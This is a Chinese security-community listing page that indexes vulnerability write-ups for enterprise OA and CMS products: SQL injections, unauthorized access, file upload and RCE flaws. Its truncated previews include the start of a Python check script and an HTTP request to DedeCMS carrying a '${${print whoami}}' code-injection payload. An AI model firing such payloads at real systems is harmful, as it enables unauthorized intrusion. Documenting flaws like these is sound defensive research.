通知图标

欢迎访问秃兔安全

秃兔_秃兔安全_第22页
秃兔的头像_秃兔安全
徽章-创作大使_秃兔安全徽章-资深玩家_秃兔安全徽章-初出茅庐_秃兔安全8枚徽章兔窝大兔兔广东管理员超级版主
泛微e-cology9接口WorkPlanService前台SQL注入漏洞_秃兔安全
金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞_秃兔安全
LiveNVR流媒体服务软件存在未授权访问漏洞_秃兔安全
蓝凌EIS智慧协同平台fl_define_flow_chart_show.aspx SQL注入_秃兔安全
AJ-Report开源数据大屏存在远程命令执行漏洞_秃兔安全
【渗透文库】优惠活动/券/积分获取场景业务逻辑测试_秃兔安全

【渗透文库】优惠活动/券/积分获取场景业务逻辑测试

测试描述:通过抓包工具分析优惠活动/券/积分获取场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞。 测试标签:WEB应用安全测试 业务场景:涉及优惠活动/券/积分获取场景 测试...
万户-ezOFFICE-OA-officeserver.jsp文件上传漏洞_秃兔安全
泛微E-cology9 browserjsp SQL注入漏洞_秃兔安全

泛微E-cology9 browserjsp SQL注入漏洞

import argparseimport requestsfrom termcolor import coloredimport signal requests.packages.urllib3.disable_warnings()output_file = None def check_url(url, output=None):headers = {...
11个月前
09615
DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞_秃兔安全

DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞

GET /dede/sys_verifies.php?action=getfiles&refiles[]=123${${print%20whoami}} HTTP/1.1Host: 127.0.0.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100...
11个月前
09615
锐捷EG350易网关管理系统存在信息泄露漏洞_秃兔安全

秃兔音乐盒